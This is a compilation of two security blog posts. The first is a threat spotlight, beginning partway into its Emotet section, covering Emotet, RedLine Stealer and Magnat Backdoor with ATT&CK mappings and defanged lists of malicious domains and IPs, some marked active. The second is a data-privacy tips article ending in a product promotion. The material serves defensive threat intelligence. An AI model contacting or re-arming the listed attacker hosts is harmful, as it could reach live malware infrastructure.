Target Businesses: Any
Exploits: N/A

Mitre ATT&CK for Emotet

Initial Access:
Phishing: Spearphishing Attachment or Spearphishing Link, Valid Accounts: Local Accounts
Discovery:
Account Discovery
Process Discovery
Persistence:
Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
Create or Modify System Process: Windows Service
Scheduled Task/Job: Scheduled Task
Execution:
Command and Scripting Interpreter: PowerShell, Windows Command Shell, Visual Basic
User Execution: Malicious Link, Malicious File
Windows Management Instrumentation
Evasion:
Obfuscated Files or Information
Software Packing
Collection:
Archive Collected Data
Email Collection: Local Email Collection
Credential Access:
Brute Force: Password Guessing
Credentials From Password Stores: Credentials from Web Browsers
Network Sniffing
OS Credential Dumping: LSASS Memory
Unsecured Credentials: Credentials In Files
Command and Control:
Encrypted Channel: Asymmetric Cryptography, Non-Standard Port
Exfiltration:
Exfiltration Over C2 Channel
Lateral Movement:
Exploitation of Remote Services
Remote Services: SMB/Windows Admin Shares
Privilege Escalation:
Process Injection: Dynamic-Link Library Injection

IOCs:

Domains (Active)

cars-taxonomy[.]mywebartist[.]eu
crownadvertising[.]ca
giadinhviet[.]com
hpoglobalconsulting[.]com
immoinvest[.]com[.]br
itomsystem[.]in
pasionportufuturo[.]pe
thetrendskill[.]com
visteme[.]mx
cursossemana[.]com
callswayroofco[.]com
dipingwang[.]com
yougandan[.]com

Domains (Historical)

adorwelding[.]zmotpro[.]com
alfadandoinc[.]com
alfaofarms[.]com
av-quiz[.]tk
ceshidizhi[.]xyz
ckfoods[.]netdevanture[.]com[.]sg
evgeniys[.]ru
goodtech[.]cetxlabs[.]com
html[.]gugame[.]net
huskysb[.]com
im2020[.]vip
jamaateislami[.]com
laptopinpakistan[.]com
linebot[.]gugame[.]net
lpj917[.]com
manak[.]edunetfoundation[.]org
newsmag[.]danielolayinkas[.]com
onlinemanager[.]site
parentingkiss[.]com
pibita[.]net
primtalent[.]com
protracologistics[.]com
ranvipclub[.]net
ridcyf[.]com
server[.]zmotpro[.]com
staviancjs[.]com
team[.]stagingapps[.]xyz
thepilatesstudionj[.]com
vcilimitado[.]com
vegandietary[.]com
voltaicplasma[.]com
www[.]168801[.]xyz
www[.]caboturnup[.]com
xanthelasmaremoval[.]com
yoho[.]love

IPs (Active)

151[.]80[.]142[.]33
87 [.] 248 [.] 77 [.] 159
159 [.] 65 [.] 76 [.] 245

IPs (Historical)

105[.]247[.]100[.]215
118[.]244[.]214[.]210
120[.]150[.]206[.]156
12[.]57[.]239[.]19
139[.]162[.]157[.]8
139[.]59[.]242[.]76
169[.]64[.]242[.]153
173[.]90[.]152[.]220
179[.]52[.]236[.]96
181[.]119[.]30[.]35
181[.]229[.]155[.]11
185[.]129[.]3[.]211
185[.]97[.]32[.]6
186[.]176[.]182[.]192
186[.]4[.]234[.]27
189[.]130[.]50[.]85
189[.]234[.]165[.]149
190[.]128[.]27[.]233
200[.]27[.]55[.]100
200[.]56[.]104[.]44
208[.]180[.]149[.]228
208[.]180[.]246[.]147
216[.]176[.]21[.]143
216[.]251[.]1[.]1
23[.]254[.]203[.]51
24[.]206[.]17[.]102
37[.]120[.]175[.]15
45[.]123[.]3[.]54
50[.]100[.]215[.]149
50[.]125[.]99[.]70
51[.]75[.]168[.]89
54[.]39[.]176[.]22
54[.]39[.]181[.]130
67[.]215[.]49[.]234
67[.]43[.]253[.]189
86[.]98[.]71[.]86
92[.]207[.]145[.]74
96[.]246[.]206[.]16

Additional Information:

Back from the dead: Emotet re-emerges, begins rebuilding to wrap up 2021
Corporate Loader “Emotet”: History of “X” Project Return for Ransomware

Which Cisco Products Can Block:

Cisco Secure Endpoint
Cisco Secure Email
Cisco Secure Firewall/Secure IPS
Cisco Secure Malware Analytics
Cisco Umbrella
Cisco Secure Web Appliance

Threat Name: RedLine Stealer

Threat Type: Information Stealer

Attack Chain:

Description: RedLine is an information stealer available as a Malware-as-a-Service (MaaS) on Russian underground forums. It steals information like login credentials, autocomplete fields, passwords, and credit card information from browsers. It also collects information about the user and their system, like the username, location, hardware configuration, and installed security software. Finally, a recent update to RedLine also adds the ability to stead cryptocurrency cold wallets. RedLine appears to be under active development, with frequent introductions of new features.

RedLine Spotlight: Security researchers discovered that most stolen credentials currently sold on the dark web underground markets had been collected using RedLine Stealer malware. RedLine Stealer attempts to harvest information from browsers – like passwords, cryptocurrency wallets, and VPN services – and system information – like hardware configuration and location. Over the past year, RedLine has been enhanced with the addition of new features. It is now capable of loading other malware software and running commands while periodically sending updates containing new information from the infected host to its C2. The main goal of cybercrime campaigns utilizing RedLine Stealer appears to be the sale of stolen data to other cybercriminals who weaponize it in their own attacks.

Target Geolocations: Any
Target Data: User Credentials, Browser Data, Financial and Personal Information, Cryptocurrency Wallets
Target Businesses: Any
Exploits: N/A

MITRE ATT&CK for RedLine

Initial Access:
Phishing
Trojanized Applications
Credential Access:
Credentials from Password Stores
Steal Web Session Cookie
Unsecured Credentials
Credentials from Password Stores: Credentials from Web Browsers
Discovery:
Account Discovery
Software Discovery
Process Discovery
System Time Discovery
System Service Discovery
System Location Discovery
Peripheral Device Discovery
Persistence:
Registry Run Keys/Startup Folder
Scheduled Task/Job: Scheduled Task
Execution:
User Execution
Command and Scripting Interpreter: PowerShell
Evasion:
Impair Defenses: Disable or Modify Tools
Collection:
Screen Capture
Command and Control:
Non-Standard Port
Non-Application Layer Protocol
Exfiltration:
Exfiltration Over C2 Channel

IOCs

Domains (Historical)

userauto[.]space
22231jssdszs[.]fun
hssubnsx[.]xyz
dshdh377dsj[.]fun

IPs (Active)

185[.]215[.]113[.]114

IPs (Historical)

37[.]0[.]8[.]88
193[].142[.]59[.]119
136[.]144[.]41[.]201

Additional Information

RedLine Stealer identified as primary source of stolen credentials on two dark web markets
Redline Stealer
Shining a Light on RedLine Stealer Malware and Identity Data Found in Criminal Shops

Which Cisco Products Can Block:
Cisco Secure Endpoint
Cisco Secure Email
Cisco Secure Firewall/Secure IPS
Cisco Secure Malware Analytics
Cisco Umbrella
Cisco Secure Web Appliance

Threat Name: Magnat Backdoor

Threat Type: BackDoor

Attack Chain:[1]

Graphic showing the attack chain for Magnat BackDoor: Malvertising to Download Fake Installer to Dee-Obfuscation to RDP Backdoor/Information Stealer/Chrome Extension Installer to Command and Control. The graphic indicates that Umbrella protects users against Malvertising, Download Fake Installer, RDP Backdoor/Information Stealer, and Command and Control

Description: Magnat BackDoor is an AutoIt-based installer that prepares a system for remote Microsoft Desktop Access and forwards the RDP service port on an outbound SSH tunnel. This installer’s actions pave the way for the attacker to access the system remotely via RDP. The malware applies this technique by setting up a scheduled task that periodically contacts a C2 server and sets up the tunnel if instructed by the C2 response.

Magnat BackDoor Spotlight: Cisco Talos recently observed a malicious campaign offering fake installers of popular software as bait to get users to execute the malware on their systems. This campaign includes a set of malware distribution campaigns that started in late 2018 and have targeted Canada, the U.S., Australia, and some European Union countries. Two undocumented malware families (a BackDoor and a Google Chrome extension) are consistently delivered together in these campaigns. An unknown actor with the alias “magnat” is likely the author of these new families and has consistently developed and improved them. The attacker’s motivations appear to be financial gain from selling stolen credentials, executing fraudulent transactions, and providing Remote Desktop Access to systems.

Target Geolocations: Canada, U.S., Australia, E.U. Countries
Target Data: Credentials, Sensitive Data
Target Businesses: Any

MITRE ATT&ACK for Magnat BackDoor

Initial Access:
Malvertising
Persistence:
Scheduled Task/Job
Execution:
Scheduled Task/Job
Evasion:
Impair Defenses: Disable or Modify System Firewall
Deobfuscate/Decode Files or Information
Command and Control:
Application Layer Protocol
Exfiltration:
Exfiltration Over Command and Control Channel

IOCs

Domains (Active)

chocolatepuma[.]casa
wormbrainteam[.]club
430lodsfb[.]xyz
softstatistic[.]xyz
happyheadshot[.]club
aaabasick[.]fun
nnyearhappy[.]club
teambrainworm[.]club
yanevinovat[.]club
fartoviypapamojetvse[.]club
hugecarspro[.]space
burstyourbubble[.]icu
boogieboom[.]host
cgi-lineup[.]website
newdawnera[.]fun
bhajhhsy6[.]site
iisnbnd7723hj[.]digital
sdcdsujnd555w[.]digital

Additional Information:

Magnat campaigns use malvertising to deliver information stealer, backdoor and malicious Chrome extension

Which Cisco Products Can Block:
Cisco Secure Endpoint
Cisco Secure Firewall/Secure IPS
Cisco Secure Malware Analytics
Cisco Umbrella

[1] While Cisco products can protect against RDP BackDoor and Information Stealer, they do not protect against Chrome Extension Installers

Source :
https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-emotet-redline-stealer-magnat-backdoor

Why You Need to Care About Data Privacy & 5 Tips for Better Data Security

The privacy of our data has always been important. However, because we’re sharing more of it than ever before, being aware of data privacy and taking the necessary steps to protect it has never been more crucial. In this article, in celebration of Data Privacy Week, we cover why data privacy is so important, what can happen if your data were to fall into the wrong hands, and what you can do to protect your personal data.

Find out if your email address appeared in any data leaks

What is data privacy and why is it important?

Data privacy often refers to the practice of handling sensitive data in line with regulatory requirements. In most developed countries, there are specific data privacy laws in place that regulate how companies can collect, store, and share customer data.

While the EU has a comprehensive data privacy law, the General Data Protection Regulation (GDPR), which covers all different types of data, only three US states currently have similar, all-encompassing data privacy laws (California, Virginia, and Colorado). Instead, the US has many different laws designed to target specific types of data. For example, the Fair Credit Reporting Act (FCRA) protects information in your credit report, and the Family Educational Rights and Privacy Act (FERPA) protects students’ education reports from being freely accessible.

However, because of how much time we spend online nowadays, we’re putting more of our personal data out there for others to see than ever before. As a result, it is not only important to understand how protected your data is when you share it with a company, but also how private it is when you share it online.

How to protect your data privacy

Here are some of our top tips for data privacy protection:

Only give your data to trustworthy companies and websites — Perhaps you’ve come across a new online clothing store or seen an app on the app store that takes your fancy, but you’re unsure if you can trust the company. If you’ve never heard of the company before, it’s best to do some quick research to learn whether or not you can trust it with your data.
Think twice before sharing — With social media being such a big part of our everyday lives, it’s easy to forget that what we post online, stays online forever. Always think twice before sharing something online. Don’t publicly share personal information such as your address, phone number, or social security number.
Take advantage of privacy settings — On every website, app, and game that you use, make sure you’re taking advantage of the built-in privacy settings. By doing so, you’ll ensure that only people you know can view your information.
Use strong passwords and enable 2FA — When you create an online account, you almost always need to share lots of personal data — your full name, email address, and date of birth, for example. Although this data isn’t publicly accessible, if a hacker were to gain access to one of your accounts, they would be able to see all this information. To avoid this happening, make sure to use only strong, tough-to-hack passwords and that all your accounts have two-factor authentication (2FA) enabled.
Use a VPN on public Wi-Fi — Unprotected Wi-Fi networks are notoriously unsecure. Because no password is required to access them, nearby hackers can steal any data transferred over them. To protect yourself, always use a VPN on public Wi-Fi networks.

Data leaks in 2021 — T-Mobile, LinkedIn, Moncler & CoinMarketCap

The truth is, no matter how well a company abides by data privacy laws and how thoroughly it protects its customers’ data, it can never be 100% data leak-proof. In 2021 alone, a shocking number of companies suffered high-profile data leaks, including T-Mobile, LinkedIn, Mon c ler, and CoinMarketCap. Those leaks resulted in hundreds of millions of people having their sensitive personal data leaked, which is used by criminals to commit all sorts of crimes — with the most concerning of them all being identity theft.

According to the Federal Trade Commission, there were over 1 million reports of identity theft in 2021. Below are some of the things the FTC says criminals can do with your data:

Get new credit cards in your name.
Open a phone, electricity, or gas account in your name.
Steal your tax refund.
Get medical care under your name (and leave you with a huge bill!).
Pretend to be you if they get arrested.

Cybercriminals often put stolen data up for sale on underground forums on the regular internet, as well as the dark web. And as you can imagine, personal information that is particularly valuable to them can fetch a high price. On average, on the dark web, a driver’s license will go for $205, an ID card for $213, and a passport sells for a whopping $684!

How to stay protected from data leaks

You might be thinking that staying protected from data leaks is an impossible task, but the answer is easy: Trend Micro™ ID Security . Available for Android and iOS, Trend Micro™ ID Security can scan the internet and the dark web 24/7 for your personal information. If your data is leaked, the app notifies you immediately so you can take action to avoid people stealing your identity. If your information is out there, you’ll be the first to know!

Here are some of the features offered by Trend Micro™ ID Security :

Personal Data Protection Score — See exactly how safe your online personal data is with your customized Protection Score.
24/7 Comprehensive Personal Data Monitoring — ID Security can scan the internet and the dark web for all your personal information including up to 5 email addresses and bank account numbers, 10 credit card numbers, your Social Security number, and lots more.
Social Media Account Protection — Strengthen the security of your social media accounts. Be instantly alerted if your Facebook or Twitter account’s data is leaked by cybercriminals.

To learn more about Trend Micro™ ID Security and claim your free 30-day trial, click the button below.Get ID Security

Source :
https://news.trendmicro.com/2022/01/27/why-you-need-to-care-about-data-privacy-5-tips-for-better-data-security/